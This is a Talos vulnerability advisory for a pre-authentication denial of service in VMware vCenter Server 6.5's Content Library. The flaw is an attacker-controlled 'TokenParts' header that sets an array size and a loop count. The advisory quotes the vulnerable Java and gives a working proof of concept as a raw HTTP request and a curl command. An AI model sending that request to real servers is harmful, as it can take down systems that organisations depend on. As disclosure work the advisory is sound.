Talos Vulnerability Report

SUMMARY

A denial of service vulnerability exists in the Content Library functionality of VMware vCenter Server 6.5 Update 3t. A specially-crafted HTTP header can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

VMware vCenter Server 6.5 Update 3t

PRODUCT URLS

vCenter Server - https://www.vmware.com/products/vcenter-server.html

CVSSv3 SCORE

8.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CWE

CWE-834 - Excessive Iteration

DETAILS

VMware vCenter Server is a platform that enables centralized control and monitoring over all virtual machines and EXSi hypervisors included in vSphere.

A pre-authentication denial-of-service (DoS) vulnerability exists in the resourcebundle handler of the cls (Content Library) service. Let us take a look at the vulnerable part of the code. Going down to the implementation of “/cls/resourcebundle/* handler, at some point we reach code located in the “SsoAuthenticatedFileStreamServlet.java” file.

Line 45  protected void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) throws ServletException {
Line 46    try {
Line 47      if (logger.isDebugEnabled())
Line 48        logger.debug(String.format("doGet: Entering (%s)", new Object[] { httpServletRequest.getRequestURI() }), new Object[0]); 
Line 49      if (this._ssoEnabled)
Line 50        try {
Line 51          byte[] payload = IOUtils.toByteArray((InputStream)httpServletRequest
Line 52              .getInputStream());
Line 53          SsoOverRestVerifierUtil.verifySecurityHeader(
Line 54              httpServletRequest, 
Line 55              payload, 
Line 56              Arrays.asList(this._stsTrustChain.getStsTrustChain()), 
Line 57              300, 
Line 58              3600);
Line 59        } catch (com.vmware.cis.services.common.sso.SsoOverRestVerifierUtil.SsoAuthException e) {
Line 60          logger.error((Throwable)e, "doGet: SSO verification failed for client " + 
Line 61              getRemoteClientInfo(httpServletRequest), new Object[0]);
Line 62          httpServletResponse
Line 63            .setStatus(401);
Line 64          return;
Line 65        } 

Going further into SsoOverRestVerifierUtil.verifySecurityHeader :

com.vmware.cis.services.common.sso.SsoOverRestVerifierUtil.java

Line 62  private static SamlToken verifySecurityHeaderImpl(HttpServletRequest request, byte[] extractedPayload, List<X509Certificate> certificates, int clockToleranceSecs, int maxRequestAgeSecs) throws SsoAuthException {
Line 63    try {
Line 64      AuthVerifier verifier = AuthVerifierFactory.instance(certificates.<X509Certificate>toArray(new X509Certificate[certificates.size()]), clockToleranceSecs, maxRequestAgeSecs);
Line 65      String[] authHeaders = parseSecurityHeader(request);
Line 66      SsoOverRestRequest reqParam = SsoOverRestHelper.createSsoOverRestRequest(request, extractedPayload);	

Finally we reach the vulnerable function parseSecurityHeader:

Line 36  private static String[] parseSecurityHeader(HttpServletRequest request) {
Line 37    int parts = Integer.parseInt(request.getHeader("TokenParts"));
Line 38    String[] authHeaders = new String[parts];
Line 39    for (int i = 0; i < parts; i++)
Line 40      authHeaders[i] = request.getHeader("TokenPart" + i); 
Line 41    return authHeaders;
Line 42  }

As you can see, an attacker sending an integer value in an http header field called TokenParts can control the number of loop iterations lines 39-40, plus has an influence on size of memory allocation line 38. Huge numbers sent as a TokenParts value will cause a high memory and CPU usage in the vCenter server and might result in a temporary denial of service.

Exploit Proof of Concept

REQ ` GET /cls/resourcebundle/123 HTTP/1.1 Host: vcenter-linux.lab.local User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: application/json, text/plain, / Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Pragma: no-cache Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close Tokenparts: 1234445566 Tokenpart: AAAAA

`

CURL

` curl -i -s -k -X $’GET’ \ -H $’Host: vcenter-linux.lab.local’ -H $’User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0’ -H $’Accept: application/json, text/plain, /’ -H $’Accept-Language: pl,en-US;q=0.7,en;q=0.3’ -H $’Accept-Encoding: gzip, deflate’ -H $’Pragma: no-cache’ -H $’Sec-Fetch-Dest: empty’ -H $’Sec-Fetch-Mode: cors’ -H $’Sec-Fetch-Site: same-origin’ -H $’Te: trailers’ -H $’Connection: close’ -H $’Tokenparts: 1234445566’ -H $’Tokenpart: AAAAA’ \ $’https://vcenter-linux.lab.local/cls/resourcebundle/123’ `

TIMELINE

2022-08-08 - Vendor Disclosure
2022-12-08 - Vendor Patch Release
2022-12-13 - Public Release